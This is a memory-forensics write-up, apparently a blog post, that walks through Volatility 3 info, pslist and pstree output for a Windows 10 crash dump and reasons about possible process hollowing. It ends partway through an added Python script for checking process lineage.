2022. 3. 24. 15:05ㆍ0x0C Forensic/IR
Keyword: Memory Dump
The investigator was given a single memory image, THEEYRIE.dmp. The table below is Volatility 3's windows.info output for it. NtMajorVersion is 10 and the kernel build is 15063 (Major/Minor 15.15063), so this is 64-bit Windows 10 (version 1703). MachineType 34404 is 0x8664 (AMD64), the memory layer is a WindowsCrashDump64Layer, i.e. the capture is in crash-dump format, and SystemTime (UTC) puts acquisition at 2020-02-13 15:13:33, which matches DumpIt.exe (PID 7996) appearing at the tail of the process list further down.
| Variable | Value |
|---|---|
| Kernel Base | 0xf8002ec04000 |
| DTB | 0x1ab000 |
| Symbols | file:///home/kali/Desktop/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/D788F72ABE964EFCACAAD0276DAAE6CB-1.json.xz |
| Is64Bit | True |
| IsPAE | False |
| layer_name | 0 WindowsIntel32e |
| memory_layer | 1 WindowsCrashDump64Layer |
| base_layer | 2 FileLayer |
| KdVersionBlock | 0xf8002ef3eff0 |
| Major/Minor | 15.15063 |
| MachineType | 34404 |
| KeNumberProcessors | 2 |
| SystemTime | 2020-02-13 15:13:33 |
| NtSystemRoot | C:\Windows |
| NtProductType | NtProductWinNt |
| NtMajorVersion | 10 |
| NtMinorVersion | 0 |
| PE MajorOperatingSystemVersion | 10 |
| PE MinorOperatingSystemVersion | 0 |
| PE Machine | 34404 |
| PE TimeDateStamp | Sat Mar 18 04:40:44 2017 |
Next, the processes present in the image are listed with windows.pslist:
└─$ python3 vol.py -f ../THEEYRIE.dmp windows.pslist.PsList
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished

| PID | PPID | ImageFileName | Offset(V) | Threads | Handles | SessionId | Wow64 | CreateTime | ExitTime | File output |
|---|---|---|---|---|---|---|---|---|---|---|
| 4 | 0 | System | 0xbf8a4b651040 | 120 | - | N/A | False | 2020-02-11 13:53:49 | N/A | Disabled |
| 300 | 4 | smss.exe | 0xbf8a4bb9b7c0 | 4 | - | N/A | False | 2020-02-11 13:53:49 | N/A | Disabled |
| 408 | 400 | csrss.exe | 0xbf8a4d8257c0 | 12 | - | 0 | False | 2020-02-11 13:53:53 | N/A | Disabled |
| 488 | 300 | smss.exe | 0xbf8a4d9d8080 | 0 | - | 1 | False | 2020-02-11 13:53:54 | 2020-02-11 13:53:54 | Disabled |
| 496 | 400 | wininit.exe | 0xbf8a4da68080 | 4 | - | 0 | False | 2020-02-11 13:53:54 | N/A | Disabled |
| 504 | 488 | csrss.exe | 0xbf8a4d9937c0 | 13 | - | 1 | False | 2020-02-11 13:53:54 | N/A | Disabled |
| 576 | 488 | winlogon.exe | 0xbf8a4dac8080 | 6 | - | 1 | False | 2020-02-11 13:53:54 | N/A | Disabled |
| 636 | 496 | services.exe | 0xbf8a4db6b080 | 21 | - | 0 | False | 2020-02-11 13:53:54 | N/A | Disabled |
| 644 | 496 | lsass.exe | 0xbf8a4dbbc080 | 15 | - | 0 | False | 2020-02-11 13:53:55 | N/A | Disabled |
| 724 | 576 | fontdrvhost.ex | 0xbf8a4de257c0 | 6 | - | 1 | False | 2020-02-11 13:53:56 | N/A | Disabled |
| 732 | 496 | fontdrvhost.ex | 0xbf8a4bb0d7c0 | 6 | - | 0 | False | 2020-02-11 13:53:56 | N/A | Disabled |
| 740 | 636 | svchost.exe | 0xbf8a4dbfb7c0 | 41 | - | 0 | False | 2020-02-11 13:53:56 | N/A | Disabled |
| 856 | 636 | svchost.exe | 0xbf8a4dcc5640 | 18 | - | 0 | False | 2020-02-11 13:53:56 | N/A | Disabled |
| 984 | 576 | dwm.exe | 0xbf8a4dd927c0 | 11 | - | 1 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 68 | 636 | svchost.exe | 0xbf8a4dd297c0 | 100 | - | 0 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 288 | 636 | svchost.exe | 0xbf8a4ddbc480 | 29 | - | 0 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 344 | 636 | svchost.exe | 0xbf8a4ddc8380 | 18 | - | 0 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 412 | 636 | svchost.exe | 0xbf8a4ddd07c0 | 47 | - | 0 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 696 | 636 | svchost.exe | 0xbf8a4ddf73c0 | 29 | - | 0 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 700 | 636 | svchost.exe | 0xbf8a4de4c280 | 23 | - | 0 | False | 2020-02-11 13:53:57 | N/A | Disabled |
| 1428 | 636 | svchost.exe | 0xbf8a4df2e600 | 9 | - | 0 | False | 2020-02-11 13:53:58 | N/A | Disabled |
| 1584 | 636 | svchost.exe | 0xbf8a4df9f080 | 5 | - | 0 | False | 2020-02-11 13:53:58 | N/A | Disabled |
| 1596 | 636 | svchost.exe | 0xbf8a4dfb07c0 | 12 | - | 0 | False | 2020-02-11 13:53:58 | N/A | Disabled |
| 1636 | 636 | svchost.exe | 0xbf8a4dfc8080 | 11 | - | 0 | False | 2020-02-11 13:53:58 | N/A | Disabled |
| 1788 | 636 | spoolsv.exe | 0xbf8a4e0907c0 | 15 | - | 0 | False | 2020-02-11 13:54:00 | N/A | Disabled |
| 1984 | 636 | svchost.exe | 0xbf8a4e0fd580 | 14 | - | 0 | False | 2020-02-11 13:54:00 | N/A | Disabled |
| 2012 | 636 | SecurityHealth | 0xbf8a4e104080 | 10 | - | 0 | False | 2020-02-11 13:54:00 | N/A | Disabled |
| 936 | 636 | VGAuthService. | 0xbf8a4e148580 | 4 | - | 0 | False | 2020-02-11 13:54:00 | N/A | Disabled |
| 1156 | 636 | vmtoolsd.exe | 0xbf8a4e14b7c0 | 11 | - | 0 | False | 2020-02-11 13:54:00 | N/A | Disabled |
| 1152 | 636 | MsMpEng.exe | 0xbf8a4e1537c0 | 31 | - | 0 | False | 2020-02-11 13:54:00 | N/A | Disabled |
| 2052 | 4 | MemCompression | 0xbf8a4e19d040 | 50 | - | N/A | False | 2020-02-11 13:54:01 | N/A | Disabled |
| 2428 | 740 | WmiPrvSE.exe | 0xbf8a4b8627c0 | 11 | - | 0 | False | 2020-02-13 15:02:18 | N/A | Disabled |
| 2652 | 636 | dllhost.exe | 0xbf8a4e3ce2c0 | 16 | - | 0 | False | 2020-02-13 15:02:20 | N/A | Disabled |
| 2772 | 636 | svchost.exe | 0xbf8a4e33e500 | 29 | - | 0 | False | 2020-02-13 15:02:21 | N/A | Disabled |
| 2880 | 636 | msdtc.exe | 0xbf8a4e4267c0 | 13 | - | 0 | False | 2020-02-13 15:02:22 | N/A | Disabled |
| 3400 | 636 | NisSrv.exe | 0xbf8a4e7cb600 | 11 | - | 0 | False | 2020-02-13 15:02:33 | N/A | Disabled |
| 3480 | 740 | WmiPrvSE.exe | 0xbf8a4e9cf080 | 10 | - | 0 | False | 2020-02-13 15:02:37 | N/A | Disabled |
| 3588 | 68 | sihost.exe | 0xbf8a4d4157c0 | 23 | - | 1 | False | 2020-02-13 15:02:38 | N/A | Disabled |
| 3596 | 636 | svchost.exe | 0xbf8a4d4287c0 | 18 | - | 1 | False | 2020-02-13 15:02:39 | N/A | Disabled |
| 3752 | 68 | taskhostw.exe | 0xbf8a4d4707c0 | 17 | - | 1 | False | 2020-02-13 15:02:41 | N/A | Disabled |
| 2804 | 576 | userinit.exe | 0xbf8a4e3715c0 | 0 | - | 1 | False | 2020-02-13 15:02:50 | 2020-02-13 15:03:31 | Disabled |
| 3068 | 2804 | explorer.exe | 0xbf8a4ecbe7c0 | 82 | - | 1 | False | 2020-02-13 15:02:50 | N/A | Disabled |
| 4328 | 636 | SearchIndexer. | 0xbf8a4dfed7c0 | 19 | - | 0 | False | 2020-02-13 15:03:09 | N/A | Disabled |
| 4532 | 740 | ShellExperienc | 0xbf8a4ee7d080 | 44 | - | 1 | False | 2020-02-13 15:03:11 | N/A | Disabled |
| 4560 | 740 | SearchUI.exe | 0xbf8a4ed797c0 | 39 | - | 1 | False | 2020-02-13 15:03:11 | N/A | Disabled |
| 4808 | 740 | RuntimeBroker. | 0xbf8a4ec217c0 | 27 | - | 1 | False | 2020-02-13 15:03:12 | N/A | Disabled |
| 444 | 740 | SkypeHost.exe | 0xbf8a4f1027c0 | 10 | - | 1 | False | 2020-02-13 15:03:17 | N/A | Disabled |
| 6052 | 3068 | MSASCuiL.exe | 0xbf8a4baf7080 | 4 | - | 1 | False | 2020-02-13 15:03:30 | N/A | Disabled |
| 6104 | 3068 | vm3dservice.ex | 0xbf8a4baff7c0 | 4 | - | 1 | False | 2020-02-13 15:03:30 | N/A | Disabled |
| 6128 | 3068 | vmtoolsd.exe | 0xbf8a4baca080 | 8 | - | 1 | False | 2020-02-13 15:03:31 | N/A | Disabled |
| 3112 | 3068 | OneDrive.exe | 0xbf8a4ed237c0 | 21 | - | 1 | True | 2020-02-13 15:03:34 | N/A | Disabled |
| 980 | 636 | svchost.exe | 0xbf8a4f06a080 | 9 | - | 0 | False | 2020-02-13 15:03:55 | N/A | Disabled |
| 5984 | 636 | svchost.exe | 0xbf8a4c168080 | 6 | - | 0 | False | 2020-02-13 15:09:22 | N/A | Disabled |
| 1804 | 1428 | audiodg.exe | 0xbf8a4bed1080 | 7 | - | 0 | False | 2020-02-13 15:09:24 | N/A | Disabled |
| 4344 | 636 | TrustedInstall | 0xbf8a4bf4c080 | 5 | - | 0 | False | 2020-02-13 15:09:40 | N/A | Disabled |
| 2624 | 740 | TiWorker.exe | 0xbf8a4bf8d080 | 4 | - | 0 | False | 2020-02-13 15:09:41 | N/A | Disabled |
| 4148 | 740 | smartscreen.ex | 0xbf8a4c1a67c0 | 23 | - | 1 | False | 2020-02-13 15:09:46 | N/A | Disabled |
| 976 | 740 | dllhost.exe | 0xbf8a4c14f7c0 | 9 | - | 1 | False | 2020-02-13 15:09:46 | N/A | Disabled |
| 5428 | 740 | ApplicationFra | 0xbf8a4bfe47c0 | 15 | - | 1 | False | 2020-02-13 15:10:17 | N/A | Disabled |
| 7184 | 740 | dllhost.exe | 0xbf8a4c1bc7c0 | 6 | - | 1 | False | 2020-02-13 15:11:28 | N/A | Disabled |
| 3624 | 7916 | GoogleCrashHan | 0xbf8a4d6747c0 | 5 | - | 0 | True | 2020-02-13 15:11:53 | N/A | Disabled |
| 8032 | 7916 | GoogleCrashHan | 0xbf8a4d9516c0 | 5 | - | 0 | False | 2020-02-13 15:11:53 | N/A | Disabled |
| 2764 | 6324 | chrome.exe | 0xbf8a4c3d6080 | 0 | - | 1 | False | 2020-02-13 15:11:54 | 2020-02-13 15:12:07 | Disabled |
| 6836 | 740 | backgroundTask | 0xbf8a4d70b7c0 | 16 | - | 1 | False | 2020-02-13 15:12:02 | N/A | Disabled |
| 5804 | 3068 | cmd.exe | 0xbf8a4be58080 | 1 | - | 1 | False | 2020-02-13 15:12:18 | N/A | Disabled |
| 2976 | 5804 | conhost.exe | 0xbf8a4f02a7c0 | 5 | - | 1 | False | 2020-02-13 15:12:18 | N/A | Disabled |
| 6140 | 7448 | MpCmdRun.exe | 0xbf8a4c680080 | 7 | - | 0 | False | 2020-02-13 15:12:33 | N/A | Disabled |
| 6152 | 3068 | notepad.exe | 0xbf8a4c064080 | 4 | - | 1 | False | 2020-02-13 15:12:52 | N/A | Disabled |
| 7728 | 740 | MicrosoftEdge. | 0xbf8a4dcb17c0 | 49 | - | 1 | False | 2020-02-13 15:12:58 | N/A | Disabled |
| 6956 | 740 | browser_broker | 0xbf8a4d629500 | 10 | - | 1 | False | 2020-02-13 15:12:59 | N/A | Disabled |
| 3820 | 740 | MicrosoftEdgeC | 0xbf8a4bcb93c0 | 13 | - | 1 | False | 2020-02-13 15:13:01 | N/A | Disabled |
| 6240 | 6660 | MpCmdRun.exe | 0xbf8a4bda77c0 | 10 | - | 0 | False | 2020-02-13 15:13:02 | N/A | Disabled |
| 8108 | 740 | MicrosoftEdgeC | 0xbf8a4c6137c0 | 0 | - | 1 | False | 2020-02-13 15:13:02 | 2020-02-13 15:13:27 | Disabled |
| 6824 | 740 | InstallAgent.e | 0xbf8a4bfc47c0 | 7 | - | 1 | False | 2020-02-13 15:13:02 | N/A | Disabled |
| 6252 | 740 | MicrosoftEdgeC | 0xbf8a4bedd080 | 0 | - | 1 | False | 2020-02-13 15:13:03 | 2020-02-13 15:13:24 | Disabled |
| 6440 | 740 | MicrosoftEdgeC | 0xbf8a4d86b080 | 42 | - | 1 | False | 2020-02-13 15:13:05 | N/A | Disabled |
| 8008 | 6240 | mpam-4baaea55. | 0xbf8a4bd537c0 | 3 | - | 0 | False | 2020-02-13 15:13:10 | N/A | Disabled |
| 6028 | 636 | svchost.exe | 0xbf8a4d3467c0 | 7 | - | 0 | False | 2020-02-13 15:13:11 | N/A | Disabled |
| 1996 | 4064 | chrome.exe | 0xbf8a4be88080 | 1 | - | 1 | False | 2020-02-13 15:13:19 | N/A | Disabled |
| 5244 | 8008 | MpSigStub.exe | 0xbf8a4c612080 | 6 | - | 0 | False | 2020-02-13 15:13:20 | N/A | Disabled |
| 6200 | 740 | MicrosoftEdgeC | 0xbf8a4d18b080 | 39 | - | 1 | False | 2020-02-13 15:13:27 | N/A | Disabled |
| 7336 | 740 | MicrosoftEdgeC | 0xbf8a4c6b6080 | 0 | - | 1 | False | 2020-02-13 15:13:28 | 2020-02-13 15:13:50 | Disabled |
| 7996 | 3068 | DumpIt.exe | 0xbf8a4d82b080 | 6 | - | 1 | False | 2020-02-13 15:13:31 | N/A | Disabled |
| 4004 | 7996 | conhost.exe | 0xbf8a4bf03080 | 5 | - | 1 | False | 2020-02-13 15:13:31 | N/A | Disabled |
| 3084 | 740 | dllhost.exe | 0xbf8a4e702080 | 0 | - | 1 | False | 2020-02-13 15:13:37 | 2020-02-13 15:13:42 | Disabled |
Nothing in that list stands out by image name: every entry is a stock Windows, VMware Tools, Defender, Chrome or Edge binary, and DumpIt.exe (PID 7996) is the acquisition tool itself. The investigator's working hypothesis was therefore process hollowing, in which a legitimately named process is started and its mapped image replaced, so that the name lies and only the lineage, the thread count and the image contents can give it away. Two details already visible in the list argue for looking harder at chrome.exe 1996: its parent (PID 4064) is not in the snapshot, and it is alive with exactly one thread, far fewer than any genuine Chrome process uses. chrome.exe 2764 (parent 6324), both MpCmdRun.exe instances (parents 7448 and 6660) and both GoogleCrashHandler instances (parent 7916) also have parents that have already exited; that alone is not malicious, but each of them has to be explained. The process tree is the next step.
The same processes as a tree (windows.pstree), which makes parent/child relationships visible:
└─$ python3 vol.py -f ../THEEYRIE.dmp windows.pstree.PsTree
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished

Leading asterisks in the PID column are vol3's depth markers (one per level below a root); processes printed without asterisks are roots whose parent is not in the image.

| PID | PPID | ImageFileName | Offset(V) | Threads | Handles | SessionId | Wow64 | CreateTime | ExitTime |
|---|---|---|---|---|---|---|---|---|---|
| 4 | 0 | System | 0xbf8a4b651040 | 120 | - | N/A | False | 2020-02-11 13:53:49 | N/A |
| * 300 | 4 | smss.exe | 0xbf8a4bb9b7c0 | 4 | - | N/A | False | 2020-02-11 13:53:49 | N/A |
| ** 488 | 300 | smss.exe | 0xbf8a4d9d8080 | 0 | - | 1 | False | 2020-02-11 13:53:54 | 2020-02-11 13:53:54 |
| *** 504 | 488 | csrss.exe | 0xbf8a4d9937c0 | 13 | - | 1 | False | 2020-02-11 13:53:54 | N/A |
| *** 576 | 488 | winlogon.exe | 0xbf8a4dac8080 | 6 | - | 1 | False | 2020-02-11 13:53:54 | N/A |
| **** 984 | 576 | dwm.exe | 0xbf8a4dd927c0 | 11 | - | 1 | False | 2020-02-11 13:53:57 | N/A |
| **** 724 | 576 | fontdrvhost.ex | 0xbf8a4de257c0 | 6 | - | 1 | False | 2020-02-11 13:53:56 | N/A |
| **** 2804 | 576 | userinit.exe | 0xbf8a4e3715c0 | 0 | - | 1 | False | 2020-02-13 15:02:50 | 2020-02-13 15:03:31 |
| ***** 3068 | 2804 | explorer.exe | 0xbf8a4ecbe7c0 | 82 | - | 1 | False | 2020-02-13 15:02:50 | N/A |
| ****** 6052 | 3068 | MSASCuiL.exe | 0xbf8a4baf7080 | 4 | - | 1 | False | 2020-02-13 15:03:30 | N/A |
| ****** 3112 | 3068 | OneDrive.exe | 0xbf8a4ed237c0 | 21 | - | 1 | True | 2020-02-13 15:03:34 | N/A |
| ****** 6152 | 3068 | notepad.exe | 0xbf8a4c064080 | 4 | - | 1 | False | 2020-02-13 15:12:52 | N/A |
| ****** 5804 | 3068 | cmd.exe | 0xbf8a4be58080 | 1 | - | 1 | False | 2020-02-13 15:12:18 | N/A |
| ******* 2976 | 5804 | conhost.exe | 0xbf8a4f02a7c0 | 5 | - | 1 | False | 2020-02-13 15:12:18 | N/A |
| ****** 6128 | 3068 | vmtoolsd.exe | 0xbf8a4baca080 | 8 | - | 1 | False | 2020-02-13 15:03:31 | N/A |
| ****** 6104 | 3068 | vm3dservice.ex | 0xbf8a4baff7c0 | 4 | - | 1 | False | 2020-02-13 15:03:30 | N/A |
| ****** 7996 | 3068 | DumpIt.exe | 0xbf8a4d82b080 | 6 | - | 1 | False | 2020-02-13 15:13:31 | N/A |
| ******* 4004 | 7996 | conhost.exe | 0xbf8a4bf03080 | 5 | - | 1 | False | 2020-02-13 15:13:31 | N/A |
| * 2052 | 4 | MemCompression | 0xbf8a4e19d040 | 50 | - | N/A | False | 2020-02-11 13:54:01 | N/A |
| 408 | 400 | csrss.exe | 0xbf8a4d8257c0 | 12 | - | 0 | False | 2020-02-11 13:53:53 | N/A |
| 496 | 400 | wininit.exe | 0xbf8a4da68080 | 4 | - | 0 | False | 2020-02-11 13:53:54 | N/A |
| * 644 | 496 | lsass.exe | 0xbf8a4dbbc080 | 15 | - | 0 | False | 2020-02-11 13:53:55 | N/A |
| * 732 | 496 | fontdrvhost.ex | 0xbf8a4bb0d7c0 | 6 | - | 0 | False | 2020-02-11 13:53:56 | N/A |
| * 636 | 496 | services.exe | 0xbf8a4db6b080 | 21 | - | 0 | False | 2020-02-11 13:53:54 | N/A |
| ** 1152 | 636 | MsMpEng.exe | 0xbf8a4e1537c0 | 31 | - | 0 | False | 2020-02-11 13:54:00 | N/A |
| ** 1156 | 636 | vmtoolsd.exe | 0xbf8a4e14b7c0 | 11 | - | 0 | False | 2020-02-11 13:54:00 | N/A |
| ** 3596 | 636 | svchost.exe | 0xbf8a4d4287c0 | 18 | - | 1 | False | 2020-02-13 15:02:39 | N/A |
| ** 6028 | 636 | svchost.exe | 0xbf8a4d3467c0 | 7 | - | 0 | False | 2020-02-13 15:13:11 | N/A |
| ** 1428 | 636 | svchost.exe | 0xbf8a4df2e600 | 9 | - | 0 | False | 2020-02-11 13:53:58 | N/A |
| *** 1804 | 1428 | audiodg.exe | 0xbf8a4bed1080 | 7 | - | 0 | False | 2020-02-13 15:09:24 | N/A |
| ** 412 | 636 | svchost.exe | 0xbf8a4ddd07c0 | 47 | - | 0 | False | 2020-02-11 13:53:57 | N/A |
| ** 288 | 636 | svchost.exe | 0xbf8a4ddbc480 | 29 | - | 0 | False | 2020-02-11 13:53:57 | N/A |
| ** 936 | 636 | VGAuthService. | 0xbf8a4e148580 | 4 | - | 0 | False | 2020-02-11 13:54:00 | N/A |
| ** 1584 | 636 | svchost.exe | 0xbf8a4df9f080 | 5 | - | 0 | False | 2020-02-11 13:53:58 | N/A |
| ** 696 | 636 | svchost.exe | 0xbf8a4ddf73c0 | 29 | - | 0 | False | 2020-02-11 13:53:57 | N/A |
| ** 700 | 636 | svchost.exe | 0xbf8a4de4c280 | 23 | - | 0 | False | 2020-02-11 13:53:57 | N/A |
| ** 1596 | 636 | svchost.exe | 0xbf8a4dfb07c0 | 12 | - | 0 | False | 2020-02-11 13:53:58 | N/A |
| ** 1984 | 636 | svchost.exe | 0xbf8a4e0fd580 | 14 | - | 0 | False | 2020-02-11 13:54:00 | N/A |
| ** 2880 | 636 | msdtc.exe | 0xbf8a4e4267c0 | 13 | - | 0 | False | 2020-02-13 15:02:22 | N/A |
| ** 68 | 636 | svchost.exe | 0xbf8a4dd297c0 | 100 | - | 0 | False | 2020-02-11 13:53:57 | N/A |
| *** 3752 | 68 | taskhostw.exe | 0xbf8a4d4707c0 | 17 | - | 1 | False | 2020-02-13 15:02:41 | N/A |
| *** 3588 | 68 | sihost.exe | 0xbf8a4d4157c0 | 23 | - | 1 | False | 2020-02-13 15:02:38 | N/A |
| ** 3400 | 636 | NisSrv.exe | 0xbf8a4e7cb600 | 11 | - | 0 | False | 2020-02-13 15:02:33 | N/A |
| ** 2772 | 636 | svchost.exe | 0xbf8a4e33e500 | 29 | - | 0 | False | 2020-02-13 15:02:21 | N/A |
| ** 980 | 636 | svchost.exe | 0xbf8a4f06a080 | 9 | - | 0 | False | 2020-02-13 15:03:55 | N/A |
| ** 344 | 636 | svchost.exe | 0xbf8a4ddc8380 | 18 | - | 0 | False | 2020-02-11 13:53:57 | N/A |
| ** 856 | 636 | svchost.exe | 0xbf8a4dcc5640 | 18 | - | 0 | False | 2020-02-11 13:53:56 | N/A |
| ** 2012 | 636 | SecurityHealth | 0xbf8a4e104080 | 10 | - | 0 | False | 2020-02-11 13:54:00 | N/A |
| ** 2652 | 636 | dllhost.exe | 0xbf8a4e3ce2c0 | 16 | - | 0 | False | 2020-02-13 15:02:20 | N/A |
| ** 5984 | 636 | svchost.exe | 0xbf8a4c168080 | 6 | - | 0 | False | 2020-02-13 15:09:22 | N/A |
| ** 740 | 636 | svchost.exe | 0xbf8a4dbfb7c0 | 41 | - | 0 | False | 2020-02-11 13:53:56 | N/A |
| *** 3084 | 740 | dllhost.exe | 0xbf8a4e702080 | 0 | - | 1 | False | 2020-02-13 15:13:37 | 2020-02-13 15:13:42 |
| *** 7184 | 740 | dllhost.exe | 0xbf8a4c1bc7c0 | 6 | - | 1 | False | 2020-02-13 15:11:28 | N/A |
| *** 3480 | 740 | WmiPrvSE.exe | 0xbf8a4e9cf080 | 10 | - | 0 | False | 2020-02-13 15:02:37 | N/A |
| *** 6824 | 740 | InstallAgent.e | 0xbf8a4bfc47c0 | 7 | - | 1 | False | 2020-02-13 15:13:02 | N/A |
| *** 6440 | 740 | MicrosoftEdgeC | 0xbf8a4d86b080 | 42 | - | 1 | False | 2020-02-13 15:13:05 | N/A |
| *** 7336 | 740 | MicrosoftEdgeC | 0xbf8a4c6b6080 | 0 | - | 1 | False | 2020-02-13 15:13:28 | 2020-02-13 15:13:50 |
| *** 6956 | 740 | browser_broker | 0xbf8a4d629500 | 10 | - | 1 | False | 2020-02-13 15:12:59 | N/A |
| *** 8108 | 740 | MicrosoftEdgeC | 0xbf8a4c6137c0 | 0 | - | 1 | False | 2020-02-13 15:13:02 | 2020-02-13 15:13:27 |
| *** 7728 | 740 | MicrosoftEdge. | 0xbf8a4dcb17c0 | 49 | - | 1 | False | 2020-02-13 15:12:58 | N/A |
| *** 4532 | 740 | ShellExperienc | 0xbf8a4ee7d080 | 44 | - | 1 | False | 2020-02-13 15:03:11 | N/A |
| *** 4148 | 740 | smartscreen.ex | 0xbf8a4c1a67c0 | 23 | - | 1 | False | 2020-02-13 15:09:46 | N/A |
| *** 5428 | 740 | ApplicationFra | 0xbf8a4bfe47c0 | 15 | - | 1 | False | 2020-02-13 15:10:17 | N/A |
| *** 6836 | 740 | backgroundTask | 0xbf8a4d70b7c0 | 16 | - | 1 | False | 2020-02-13 15:12:02 | N/A |
| *** 6200 | 740 | MicrosoftEdgeC | 0xbf8a4d18b080 | 39 | - | 1 | False | 2020-02-13 15:13:27 | N/A |
| *** 444 | 740 | SkypeHost.exe | 0xbf8a4f1027c0 | 10 | - | 1 | False | 2020-02-13 15:03:17 | N/A |
| *** 2624 | 740 | TiWorker.exe | 0xbf8a4bf8d080 | 4 | - | 0 | False | 2020-02-13 15:09:41 | N/A |
| *** 4808 | 740 | RuntimeBroker. | 0xbf8a4ec217c0 | 27 | - | 1 | False | 2020-02-13 15:03:12 | N/A |
| *** 4560 | 740 | SearchUI.exe | 0xbf8a4ed797c0 | 39 | - | 1 | False | 2020-02-13 15:03:11 | N/A |
| *** 976 | 740 | dllhost.exe | 0xbf8a4c14f7c0 | 9 | - | 1 | False | 2020-02-13 15:09:46 | N/A |
| *** 3820 | 740 | MicrosoftEdgeC | 0xbf8a4bcb93c0 | 13 | - | 1 | False | 2020-02-13 15:13:01 | N/A |
| *** 6252 | 740 | MicrosoftEdgeC | 0xbf8a4bedd080 | 0 | - | 1 | False | 2020-02-13 15:13:03 | 2020-02-13 15:13:24 |
| *** 2428 | 740 | WmiPrvSE.exe | 0xbf8a4b8627c0 | 11 | - | 0 | False | 2020-02-13 15:02:18 | N/A |
| ** 1636 | 636 | svchost.exe | 0xbf8a4dfc8080 | 11 | - | 0 | False | 2020-02-11 13:53:58 | N/A |
| ** 4328 | 636 | SearchIndexer. | 0xbf8a4dfed7c0 | 19 | - | 0 | False | 2020-02-13 15:03:09 | N/A |
| ** 4344 | 636 | TrustedInstall | 0xbf8a4bf4c080 | 5 | - | 0 | False | 2020-02-13 15:09:40 | N/A |
| ** 1788 | 636 | spoolsv.exe | 0xbf8a4e0907c0 | 15 | - | 0 | False | 2020-02-11 13:54:00 | N/A |
| 3624 | 7916 | GoogleCrashHan | 0xbf8a4d6747c0 | 5 | - | 0 | True | 2020-02-13 15:11:53 | N/A |
| 8032 | 7916 | GoogleCrashHan | 0xbf8a4d9516c0 | 5 | - | 0 | False | 2020-02-13 15:11:53 | N/A |
| 2764 | 6324 | chrome.exe | 0xbf8a4c3d6080 | 0 | - | 1 | False | 2020-02-13 15:11:54 | 2020-02-13 15:12:07 |
| 6140 | 7448 | MpCmdRun.exe | 0xbf8a4c680080 | 7 | - | 0 | False | 2020-02-13 15:12:33 | N/A |
| 6240 | 6660 | MpCmdRun.exe | 0xbf8a4bda77c0 | 10 | - | 0 | False | 2020-02-13 15:13:02 | N/A |
| * 8008 | 6240 | mpam-4baaea55. | 0xbf8a4bd537c0 | 3 | - | 0 | False | 2020-02-13 15:13:10 | N/A |
| ** 5244 | 8008 | MpSigStub.exe | 0xbf8a4c612080 | 6 | - | 0 | False | 2020-02-13 15:13:20 | N/A |
| 1996 | 4064 | chrome.exe | 0xbf8a4be88080 | 1 | - | 1 | False | 2020-02-13 15:13:19 | N/A |
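The lineage check that the tree invites, as an added example (it is not part of the original write-up): parse vol3's tab-separated pslist output and flag processes whose parent is absent from the snapshot or differs from the parent Windows 10 normally gives them. The sample listing inside the script is a constructed subset of the THEEYRIE rows above; the expected-parent table and the set of children whose parents legitimately exit at boot (csrss, wininit, winlogon, explorer) are assumptions encoding standard Windows 10 boot lineage and should be adjusted per build.

```python
"""Lineage triage over Volatility 3 windows.pslist output (added example)."""
import sys
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed sample: a subset of the THEEYRIE pslist rows, re-serialised
# in the tab-separated layout vol3 prints (timestamps keep vol3's .000000).
PSLIST_SAMPLE = "\n".join([
    "Volatility 3 Framework 2.0.2",
    "PID\tPPID\tImageFileName\tO" "ffset(V)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tFile output",
    "4\t0\tSystem\t0xbf8a4b651040\t120\t-\tN/A\tFalse\t2020-02-11 13:53:49.000000\tN/A\tDisabled",
    "300\t4\tsmss.exe\t0xbf8a4bb9b7c0\t4\t-\tN/A\tFalse\t2020-02-11 13:53:49.000000\tN/A\tDisabled",
    "488\t300\tsmss.exe\t0xbf8a4d9d8080\t0\t-\t1\tFalse\t2020-02-11 13:53:54.000000\t2020-02-11 13:53:54.000000\tDisabled",
    "408\t400\tcsrss.exe\t0xbf8a4d8257c0\t12\t-\t0\tFalse\t2020-02-11 13:53:53.000000\tN/A\tDisabled",
    "496\t400\twininit.exe\t0xbf8a4da68080\t4\t-\t0\tFalse\t2020-02-11 13:53:54.000000\tN/A\tDisabled",
    "576\t488\twinlogon.exe\t0xbf8a4dac8080\t6\t-\t1\tFalse\t2020-02-11 13:53:54.000000\tN/A\tDisabled",
    "636\t496\tservices.exe\t0xbf8a4db6b080\t21\t-\t0\tFalse\t2020-02-11 13:53:54.000000\tN/A\tDisabled",
    "740\t636\tsvchost.exe\t0xbf8a4dbfb7c0\t41\t-\t0\tFalse\t2020-02-11 13:53:56.000000\tN/A\tDisabled",
    "2804\t576\tuserinit.exe\t0xbf8a4e3715c0\t0\t-\t1\tFalse\t2020-02-13 15:02:50.000000\t2020-02-13 15:03:31.000000\tDisabled",
    "3068\t2804\texplorer.exe\t0xbf8a4ecbe7c0\t82\t-\t1\tFalse\t2020-02-13 15:02:50.000000\tN/A\tDisabled",
    "5804\t3068\tcmd.exe\t0xbf8a4be58080\t1\t-\t1\tFalse\t2020-02-13 15:12:18.000000\tN/A\tDisabled",
    "6152\t3068\tnotepad.exe\t0xbf8a4c064080\t4\t-\t1\tFalse\t2020-02-13 15:12:52.000000\tN/A\tDisabled",
    "2764\t6324\tchrome.exe\t0xbf8a4c3d6080\t0\t-\t1\tFalse\t2020-02-13 15:11:54.000000\t2020-02-13 15:12:07.000000\tDisabled",
    "6140\t7448\tMpCmdRun.exe\t0xbf8a4c680080\t7\t-\t0\tFalse\t2020-02-13 15:12:33.000000\tN/A\tDisabled",
    "1996\t4064\tchrome.exe\t0xbf8a4be88080\t1\t-\t1\tFalse\t2020-02-13 15:13:19.000000\tN/A\tDisabled",
])

# Assumed Windows 10 lineage. Names are as vol3 prints them: EPROCESS
# ImageFileName, truncated to 14 characters (hence "RuntimeBroker.").
EXPECTED_PARENT: Dict[str, Set[str]] = {
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
    "dwm.exe": {"winlogon.exe"},
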